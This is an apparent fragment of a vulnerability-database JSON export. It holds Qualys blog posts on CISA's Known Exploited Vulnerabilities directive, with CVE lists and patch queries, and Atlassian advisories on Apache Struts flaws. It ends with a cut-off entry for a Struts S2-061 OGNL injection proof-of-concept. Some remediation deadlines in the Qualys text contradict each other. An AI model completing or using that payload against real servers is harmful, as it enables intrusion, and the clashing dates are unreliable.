Sign up for a 30-day, no-cost [VMDR trial](<https://www.qualys.com/forms/vmdr/>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2022-02-23T05:39:00", "type": "qualysblog", "title": "Managing CISA Known Exploited Vulnerabilities with Qualys VMDR", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-1871", "CVE-2010-5326", "CVE-2012-0158", "CVE-2012-0391", "CVE-2012-3152", "CVE-2013-3900", "CVE-2013-3906", "CVE-2014-1761", "CVE-2014-1776", "CVE-2014-1812", "CVE-2015-1635", "CVE-2015-1641", "CVE-2015-4852", "CVE-2016-0167", "CVE-2016-0185", "CVE-2016-3088", "CVE-2016-3235", "CVE-2016-3643", "CVE-2016-3976", "CVE-2016-7255", "CVE-2016-9563", "CVE-2017-0143", "CVE-2017-0144", "CVE-2017-0145", "CVE-2017-0199", "CVE-2017-0262", "CVE-2017-0263", "CVE-2017-10271", "CVE-2017-11774", "CVE-2017-11882", "CVE-2017-12149", "CVE-2017-5638", "CVE-2017-5689", "CVE-2017-6327", "CVE-2017-7269", "CVE-2017-8464", "CVE-2017-8759", "CVE-2017-9791", "CVE-2017-9805", "CVE-2017-9841", "CVE-2018-0798", "CVE-2018-0802", "CVE-2018-1000861", "CVE-2018-11776", "CVE-2018-15961", "CVE-2018-15982", "CVE-2018-2380", 
"CVE-2018-4878", "CVE-2018-4939", "CVE-2018-6789", "CVE-2018-7600", "CVE-2018-8174", "CVE-2018-8453", "CVE-2018-8653", "CVE-2019-0193", "CVE-2019-0211", "CVE-2019-0541", "CVE-2019-0604", "CVE-2019-0708", "CVE-2019-0752", "CVE-2019-0797", "CVE-2019-0803", "CVE-2019-0808", "CVE-2019-0859", "CVE-2019-0863", "CVE-2019-10149", "CVE-2019-10758", "CVE-2019-11510", "CVE-2019-11539", "CVE-2019-1214", "CVE-2019-1215", "CVE-2019-13272", "CVE-2019-1367", "CVE-2019-1429", "CVE-2019-1458", "CVE-2019-16759", "CVE-2019-17026", "CVE-2019-17558", "CVE-2019-18187", "CVE-2019-18988", "CVE-2019-2725", "CVE-2019-8394", "CVE-2019-9978", "CVE-2020-0601", "CVE-2020-0646", "CVE-2020-0674", "CVE-2020-0683", "CVE-2020-0688", "CVE-2020-0787", "CVE-2020-0796", "CVE-2020-0878", "CVE-2020-0938", "CVE-2020-0968", "CVE-2020-0986", "CVE-2020-10148", "CVE-2020-10189", "CVE-2020-1020", "CVE-2020-1040", "CVE-2020-1054", "CVE-2020-1147", "CVE-2020-11738", "CVE-2020-11978", "CVE-2020-1350", "CVE-2020-13671", "CVE-2020-1380", "CVE-2020-13927", "CVE-2020-1464", "CVE-2020-1472", "CVE-2020-14750", "CVE-2020-14871", "CVE-2020-14882", "CVE-2020-14883", "CVE-2020-15505", "CVE-2020-15999", "CVE-2020-16009", "CVE-2020-16010", "CVE-2020-16013", "CVE-2020-16017", "CVE-2020-17087", "CVE-2020-17144", "CVE-2020-17496", "CVE-2020-17530", "CVE-2020-24557", "CVE-2020-25213", "CVE-2020-2555", "CVE-2020-6207", "CVE-2020-6287", "CVE-2020-6418", "CVE-2020-6572", "CVE-2020-6819", "CVE-2020-6820", "CVE-2020-8243", "CVE-2020-8260", "CVE-2020-8467", "CVE-2020-8468", "CVE-2020-8599", "CVE-2021-1647", "CVE-2021-1675", "CVE-2021-1732", "CVE-2021-21017", "CVE-2021-21148", "CVE-2021-21166", "CVE-2021-21193", "CVE-2021-21206", "CVE-2021-21220", "CVE-2021-21224", "CVE-2021-22204", "CVE-2021-22893", "CVE-2021-22894", "CVE-2021-22899", "CVE-2021-22900", "CVE-2021-26411", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27059", "CVE-2021-27065", "CVE-2021-27085", "CVE-2021-28310", "CVE-2021-28550", "CVE-2021-30116", 
"CVE-2021-30551", "CVE-2021-30554", "CVE-2021-30563", "CVE-2021-30632", "CVE-2021-30633", "CVE-2021-31199", "CVE-2021-31201", "CVE-2021-31207", "CVE-2021-31955", "CVE-2021-31956", "CVE-2021-31979", "CVE-2021-33739", "CVE-2021-33742", "CVE-2021-33766", "CVE-2021-33771", "CVE-2021-34448", "CVE-2021-34473", "CVE-2021-34523", "CVE-2021-34527", "CVE-2021-35211", "CVE-2021-35247", "CVE-2021-36741", "CVE-2021-36742", "CVE-2021-36934", "CVE-2021-36942", "CVE-2021-36948", "CVE-2021-36955", "CVE-2021-37415", "CVE-2021-37973", "CVE-2021-37975", "CVE-2021-37976", "CVE-2021-38000", "CVE-2021-38003", "CVE-2021-38645", "CVE-2021-38647", "CVE-2021-38648", "CVE-2021-38649", "CVE-2021-40438", "CVE-2021-40444", "CVE-2021-40449", "CVE-2021-40539", "CVE-2021-4102", "CVE-2021-41773", "CVE-2021-42013", "CVE-2021-42292", "CVE-2021-42321", "CVE-2021-43890", "CVE-2021-44077", "CVE-2021-44228", "CVE-2021-44515", "CVE-2022-0609", "CVE-2022-21882", "CVE-2022-24086"], "modified": "2022-02-23T05:39:00", "id": "QUALYSBLOG:0082A77BD8EFFF48B406D107FEFD0DD3", "href": "https://blog.qualys.com/category/product-tech", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-11-09T06:36:02", "description": "[Start your VMDR 30-day, no-cost trial today](<https://www.qualys.com/forms/vmdr/>)\n\n## Overview\n\nOn November 3, 2021, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) released a [Binding Operational Directive 22-01](<https://cyber.dhs.gov/bod/22-01/>), "Reducing the Significant Risk of Known Exploited Vulnerabilities." [This directive](<https://www.cisa.gov/news/2021/11/03/cisa-releases-directive-reducing-significant-risk-known-exploited-vulnerabilities>) recommends urgent and prioritized remediation of the vulnerabilities that adversaries are actively exploiting. 
It establishes a CISA-managed catalog of known exploited vulnerabilities that carry significant risk to the federal government and establishes requirements for agencies to remediate these vulnerabilities.\n\nThis directive requires agencies to review and update agency internal vulnerability management procedures within 60 days according to this directive and remediate each vulnerability according to the timelines outlined in 'CISA's vulnerability catalog.\n\nQualys helps customers to identify and assess risk to organizations' digital infrastructure and automate remediation. Qualys' guidance for rapid response to Operational Directive is below.\n\n## Directive Scope\n\nThis directive applies to all software and hardware found on federal information systems managed on agency premises or hosted by third parties on an agency's behalf.\n\nHowever, CISA strongly recommends that private businesses and state, local, tribal, and territorial (SLTT) governments prioritize the mitigation of vulnerabilities listed in CISA's public catalog.\n\n## CISA Catalog of Known Exploited Vulnerabilities\n\nIn total, CISA posted a list of [291 Common Vulnerabilities and Exposures (CVEs)](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>) that pose the highest risk to federal agencies. The Qualys Research team has mapped all these CVEs to applicable QIDs. You can view the complete list of CVEs and the corresponding QIDs [here](<https://success.qualys.com/discussions/s/article/000006791>).\n\n### Not all vulnerabilities are created equal\n\nOur quick review of the 291 CVEs posted by CISA suggests that not all vulnerabilities hold the same priority. CISA has ordered U.S. federal enterprises to apply patches as soon as possible. The remediation guidance can be grouped into three distinct categories:\n\n#### Category 1 \u2013 Past Due\n\nRemediation of 15 CVEs (~5%) are already past due. 
These vulnerabilities include some of the most significant exploits in the recent past, including PrintNightmare, SigRed, ZeroLogon, and vulnerabilities in CryptoAPI, Pulse Secure, and more. Qualys Patch Management can help you remediate most of these vulnerabilities.\n\n#### Category 2 \u2013 Patch in less than two weeks\n\n100 (34%) Vulnerabilities need to be patched in the next two weeks, or by **November 17, 2022**.\n\n#### Category 3 \u2013 Patch within six months\n\nThe remaining 176 vulnerabilities (60%) must be patched within the next six months or by **May 3, 2022**.\n\n## Detect CISA's Vulnerabilities Using Qualys VMDR\n\nThe Qualys Research team has released several remote and authenticated detections (QIDs) for the vulnerabilities. Since the directive includes 291 CVEs, we recommend executing your search based on vulnerability criticality, release date, or other categories.\n\nFor example, to detect critical CVEs released in 2021:\n\n_vulnerabilities.vulnerability.criticality:CRITICAL and vulnerabilities.vulnerability.cveIds:[ 
`CVE-2021-1497`,`CVE-2021-1498`,`CVE-2021-1647`,`CVE-2021-1675`,`CVE-2021-1732`,`CVE-2021-1782`,`CVE-2021-1870`,`CVE-2021-1871`,`CVE-2021-1879`,`CVE-2021-1905`,`CVE-2021-1906`,`CVE-2021-20016`,`CVE-2021-21017`,`CVE-2021-21148`,`CVE-2021-21166`,`CVE-2021-21193`,`CVE-2021-21206`,`CVE-2021-21220`,`CVE-2021-21224`,`CVE-2021-21972`,`CVE-2021-21985`,`CVE-2021-22005`,`CVE-2021-22205`,`CVE-2021-22502`,`CVE-2021-22893`,`CVE-2021-22894`,`CVE-2021-22899`,`CVE-2021-22900`,`CVE-2021-22986`,`CVE-2021-26084`,`CVE-2021-26411`,`CVE-2021-26855`,`CVE-2021-26857`,`CVE-2021-26858`,`CVE-2021-27059`,`CVE-2021-27065`,`CVE-2021-27085`,`CVE-2021-27101`,`CVE-2021-27102`,`CVE-2021-27103`,`CVE-2021-27104`,`CVE-2021-28310`,`CVE-2021-28550`,`CVE-2021-28663`,`CVE-2021-28664`,`CVE-2021-30116`,`CVE-2021-30551`,`CVE-2021-30554`,`CVE-2021-30563`,`CVE-2021-30632`,`CVE-2021-30633`,`CVE-2021-30657`,`CVE-2021-30661`,`CVE-2021-30663`,`CVE-2021-30665`,`CVE-2021-30666`,`CVE-2021-30713`,`CVE-2021-30761`,`CVE-2021-30762`,`CVE-2021-30807`,`CVE-2021-30858`,`CVE-2021-30860`,`CVE-2021-30860`,`CVE-2021-30869`,`CVE-2021-31199`,`CVE-2021-31201`,`CVE-2021-31207`,`CVE-2021-31955`,`CVE-2021-31956`,`CVE-2021-31979`,`CVE-2021-33739`,`CVE-2021-33742`,`CVE-2021-33771`,`CVE-2021-34448`,`CVE-2021-34473`,`CVE-2021-34523`,`CVE-2021-34527`,`CVE-2021-35211`,`CVE-2021-36741`,`CVE-2021-36742`,`CVE-2021-36942`,`CVE-2021-36948`,`CVE-2021-36955`,`CVE-2021-37973`,`CVE-2021-37975`,`CVE-2021-37976`,`CVE-2021-38000`,`CVE-2021-38003`,`CVE-2021-38645`,`CVE-2021-38647`,`CVE-2021-38647`,`CVE-2021-38648`,`CVE-2021-38649`,`CVE-2021-40444`,`CVE-2021-40539`,`CVE-2021-41773`,`CVE-2021-42013`,`CVE-2021-42258` ]_\n\n\n\nUsing [Qualys VMDR](<https://www.qualys.com/subscriptions/vmdr/>), you can effectively prioritize those vulnerabilities using the VMDR Prioritization report.\n\n\n\nIn addition, you can locate a vulnerable host through Qualys Threat Protection by simply clicking on the impacted hosts to effectively identify and track this 
vulnerability.\n\n\n\nWith Qualys Unified Dashboard, you can track your exposure to the CISA Known Exploited Vulnerabilities and gather your status and overall management in real-time. With trending enabled for dashboard widgets, you can keep track of the status of the vulnerabilities in your environment using the ["CISA 2010-21| KNOWN EXPLOITED VULNERABILITIES"](<https://success.qualys.com/support/s/article/000006791>) Dashboard.\n\n### Detailed Operational Dashboard:\n\n\n\n### Summary Dashboard High Level Structured by Vendor:\n\n\n\n## Remediation\n\nTo comply with this directive, federal agencies must remediate most "Category 2" vulnerabilities by **November 17, 2021**, and "Category 3" by May 3, 2021. Qualys Patch Management can help streamline the remediation of many of these vulnerabilities.\n\nCustomers can copy the following query into the Patch Management app to help customers comply with the directive's aggressive remediation date of November 17, 2021. Running this query will find all required patches and allow quick and efficient deployment of those missing patches to all assets directly from within the Qualys Cloud 
Platform.\n\ncve:[`CVE-2021-1497`,`CVE-2021-1498`,`CVE-2021-1647`,`CVE-2021-1675`,`CVE-2021-1732`,`CVE-2021-1782`,`CVE-2021-1870`,`CVE-2021-1871`,`CVE-2021-1879`,`CVE-2021-1905`,`CVE-2021-1906`,`CVE-2021-20016`,`CVE-2021-21017`,`CVE-2021-21148`,`CVE-2021-21166`,`CVE-2021-21193`,`CVE-2021-21206`,`CVE-2021-21220`,`CVE-2021-21224`,`CVE-2021-21972`,`CVE-2021-21985`,`CVE-2021-22005`,`CVE-2021-22205`,`CVE-2021-22502`,`CVE-2021-22893`,`CVE-2021-22894`,`CVE-2021-22899`,`CVE-2021-22900`,`CVE-2021-22986`,`CVE-2021-26084`,`CVE-2021-26411`,`CVE-2021-26855`,`CVE-2021-26857`,`CVE-2021-26858`,`CVE-2021-27059`,`CVE-2021-27065`,`CVE-2021-27085`,`CVE-2021-27101`,`CVE-2021-27102`,`CVE-2021-27103`,`CVE-2021-27104`,`CVE-2021-28310`,`CVE-2021-28550`,`CVE-2021-28663`,`CVE-2021-28664`,`CVE-2021-30116`,`CVE-2021-30551`,`CVE-2021-30554`,`CVE-2021-30563`,`CVE-2021-30632`,`CVE-2021-30633`,`CVE-2021-30657`,`CVE-2021-30661`,`CVE-2021-30663`,`CVE-2021-30665`,`CVE-2021-30666`,`CVE-2021-30713`,`CVE-2021-30761`,`CVE-2021-30762`,`CVE-2021-30807`,`CVE-2021-30858`,`CVE-2021-30860`,`CVE-2021-30860`,`CVE-2021-30869`,`CVE-2021-31199`,`CVE-2021-31201`,`CVE-2021-31207`,`CVE-2021-31955`,`CVE-2021-31956`,`CVE-2021-31979`,`CVE-2021-33739`,`CVE-2021-33742`,`CVE-2021-33771`,`CVE-2021-34448`,`CVE-2021-34473`,`CVE-2021-34523`,`CVE-2021-34527`,`CVE-2021-35211`,`CVE-2021-36741`,`CVE-2021-36742`,`CVE-2021-36942`,`CVE-2021-36948`,`CVE-2021-36955`,`CVE-2021-37973`,`CVE-2021-37975`,`CVE-2021-37976`,`CVE-2021-38000`,`CVE-2021-38003`,`CVE-2021-38645`,`CVE-2021-38647`,`CVE-2021-38647`,`CVE-2021-38648`,`CVE-2021-38649`,`CVE-2021-40444`,`CVE-2021-40539`,`CVE-2021-41773`,`CVE-2021-42013`,`CVE-2021-42258` ]\n\n\n\nQualys patch content covers many Microsoft, Linux, and third-party applications; however, some of the vulnerabilities introduced by CISA are not currently supported out-of-the-box by Qualys. To remediate those vulnerabilities, Qualys provides the ability to deploy custom patches. 
The flexibility to customize patch deployment allows customers to patch the remaining CVEs in this list.\n\nNote that the due date for \u201cCategory 1\u201d patches has already passed. To find missing patches in your environment for \u201cCategory 1\u201d past due CVEs, copy the following query into the Patch Management app:\n\ncve:['CVE-2021-1732\u2032,'CVE-2020-1350\u2032,'CVE-2020-1472\u2032,'CVE-2021-26855\u2032,'CVE-2021-26858\u2032,'CVE-2021-27065\u2032,'CVE-2020-0601\u2032,'CVE-2021-26857\u2032,'CVE-2021-22893\u2032,'CVE-2020-8243\u2032,'CVE-2021-22900\u2032,'CVE-2021-22894\u2032,'CVE-2020-8260\u2032,'CVE-2021-22899\u2032,'CVE-2019-11510']\n\n\n\n## Federal Enterprises and Agencies Can Act Now\n\nFor federal enterprises and agencies, it's a race against time to remediate these vulnerabilities across their respective environments and achieve compliance with this binding directive. Qualys solutions can help achieve compliance with this binding directive. Qualys Cloud Platform is FedRAMP authorized, with [107 FedRAMP authorizations](<https://marketplace.fedramp.gov/#!/product/qualys-cloud-platform?sort=-authorizations>).\n\nHere are a few steps Federal enterprises can take immediately:\n\n * Run vulnerability assessments against all your assets by leveraging various sensors such as Qualys agent, scanners, and more\n * Prioritize remediation by due dates\n * Identify all vulnerable assets automatically mapped into the threat feed\n * Use Patch Management to apply patches and other configurations changes\n * Track remediation progress through Unified Dashboards\n\n## Summary\n\nUnderstanding vulnerabilities is a critical but partial part of threat mitigation. Qualys VMDR helps customers discover, assess threats, assign risk, and remediate threats in one solution. Qualys customers rely on the accuracy of Qualys' threat intelligence to protect their digital environments and stay current with patch guidance. 
Using Qualys VMDR can help any organization efficiently respond to the CISA directive.\n\n## Getting Started\n\nLearn how [Qualys VMDR](<https://www.qualys.com/subscriptions/vmdr/>) provides actionable vulnerability guidance and automates remediation in one solution. Ready to get started? Sign up for a 30-day, no-cost [VMDR trial](<https://www.qualys.com/forms/vmdr/>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-11-09T06:15:01", "type": "qualysblog", "title": "Qualys Response to CISA Alert: Binding Operational Directive 22-01", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-11510", "CVE-2020-0601", "CVE-2020-1350", "CVE-2020-1472", "CVE-2020-8243", "CVE-2020-8260", "CVE-2021-1497", "CVE-2021-1498", "CVE-2021-1647", "CVE-2021-1675", "CVE-2021-1732", "CVE-2021-1782", "CVE-2021-1870", "CVE-2021-1871", "CVE-2021-1879", "CVE-2021-1905", "CVE-2021-1906", "CVE-2021-20016", "CVE-2021-21017", "CVE-2021-21148", "CVE-2021-21166", "CVE-2021-21193", "CVE-2021-21206", "CVE-2021-21220", "CVE-2021-21224", "CVE-2021-21972", "CVE-2021-21985", "CVE-2021-22005", "CVE-2021-22205", "CVE-2021-22502", 
"CVE-2021-22893", "CVE-2021-22894", "CVE-2021-22899", "CVE-2021-22900", "CVE-2021-22986", "CVE-2021-26084", "CVE-2021-26411", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27059", "CVE-2021-27065", "CVE-2021-27085", "CVE-2021-27101", "CVE-2021-27102", "CVE-2021-27103", "CVE-2021-27104", "CVE-2021-28310", "CVE-2021-28550", "CVE-2021-28663", "CVE-2021-28664", "CVE-2021-30116", "CVE-2021-30551", "CVE-2021-30554", "CVE-2021-30563", "CVE-2021-30632", "CVE-2021-30633", "CVE-2021-30657", "CVE-2021-30661", "CVE-2021-30663", "CVE-2021-30665", "CVE-2021-30666", "CVE-2021-30713", "CVE-2021-30761", "CVE-2021-30762", "CVE-2021-30807", "CVE-2021-30858", "CVE-2021-30860", "CVE-2021-30869", "CVE-2021-31199", "CVE-2021-31201", "CVE-2021-31207", "CVE-2021-31955", "CVE-2021-31956", "CVE-2021-31979", "CVE-2021-33739", "CVE-2021-33742", "CVE-2021-33771", "CVE-2021-34448", "CVE-2021-34473", "CVE-2021-34523", "CVE-2021-34527", "CVE-2021-35211", "CVE-2021-36741", "CVE-2021-36742", "CVE-2021-36942", "CVE-2021-36948", "CVE-2021-36955", "CVE-2021-37973", "CVE-2021-37975", "CVE-2021-37976", "CVE-2021-38000", "CVE-2021-38003", "CVE-2021-38645", "CVE-2021-38647", "CVE-2021-38648", "CVE-2021-38649", "CVE-2021-40444", "CVE-2021-40539", "CVE-2021-41773", "CVE-2021-42013", "CVE-2021-42258"], "modified": "2021-11-09T06:15:01", "id": "QUALYSBLOG:BC22CE22A3E70823D5F0E944CBD5CE4A", "href": "https://blog.qualys.com/category/vulnerabilities-threat-research", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "atlassian": [{"lastseen": "2023-06-06T15:31:08", "description": "Update Apache Struts to 2.5.26 to avoid\u00a0[CVE-2020-17530|https://cwiki.apache.org/confluence/display/ww/s2-061]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 
9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-02-22T11:35:48", "type": "atlassian", "title": "Update Apache Struts 2 to avoid CVE-2020-17530", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-17530"], "modified": "2021-09-16T05:28:34", "id": "CWD-5688", "href": "https://jira.atlassian.com/browse/CWD-5688", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-09-16T06:43:42", "description": "Update Apache Struts to 2.5.26 to avoid\u00a0[CVE-2020-17530|https://cwiki.apache.org/confluence/display/ww/s2-061]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-02-22T11:35:48", "type": "atlassian", "title": "Update Apache Struts 2 to avoid CVE-2020-17530", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", 
"integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-17530"], "modified": "2021-09-16T05:28:34", "id": "ATLASSIAN:CWD-5688", "href": "https://jira.atlassian.com/browse/CWD-5688", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-13T15:38:59", "description": "Atlassian Confluence Server and Data Center is *not affected* by CVE-2019-0230 (Apache Struts Potential Remote Code Execution Vulnerability).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-09-14T01:58:06", "type": "atlassian", "title": "CVE-2019-0230 - Apache Struts Potential Remote Code Execution Vulnerability [Confluence Server is not affected]", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-0230"], "modified": "2023-01-30T21:21:15", "id": "CONFSERVER-60264", "href": "https://jira.atlassian.com/browse/CONFSERVER-60264", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, 
{"lastseen": "2021-07-28T14:40:37", "description": "Atlassian Confluence Server and Data Center is *not affected* by CVE-2019-0230 (Apache Struts Potential Remote Code Execution Vulnerability).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-09-14T01:58:06", "type": "atlassian", "title": "CVE-2019-0230 - Apache Struts Potential Remote Code Execution Vulnerability [Confluence Server is not affected]", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-0230"], "modified": "2020-11-19T05:03:06", "id": "ATLASSIAN:CONFSERVER-60264", "href": "https://jira.atlassian.com/browse/CONFSERVER-60264", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-08-21T03:44:55", "description": "h3. Issue Summary\r\nRecently, Apache released the following report regarding two different vulnerabilities in Struts 2:\r\n\r\n[|https://struts.apache.org/announce.html#a20200813]\r\n\r\nIs Confluence affected by these CVEs?\r\n\r\nh3. Steps to Reproduce\r\n Not applicable.\r\n\r\nh3. Expected Results\r\n Not applicable\r\n\r\nh3. Actual Results\r\n Not applicable\r\n\r\nh3. 
Workaround\r\n Not applicable\r\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-08-18T13:48:36", "type": "atlassian", "title": "Struts 2 CVE-2019-0230 and CVE-2019-0233 impact on Confluence", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-0233", "CVE-2019-0230"], "modified": "2020-08-21T00:02:20", "id": "ATLASSIAN:CONFSERVER-60189", "href": "https://jira.atlassian.com/browse/CONFSERVER-60189", "cvss": {"score": 0.0, "vector": "NONE"}}], "githubexploit": [{"lastseen": "2022-08-17T17:39:02", "description": "# CVE-2020-17530\n\ns2-061\n\npoc:\n\n`\n%{(#instancemanager=#applicati...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-12-09T09:53:08", "type": "githubexploit", "title": "Exploit for 
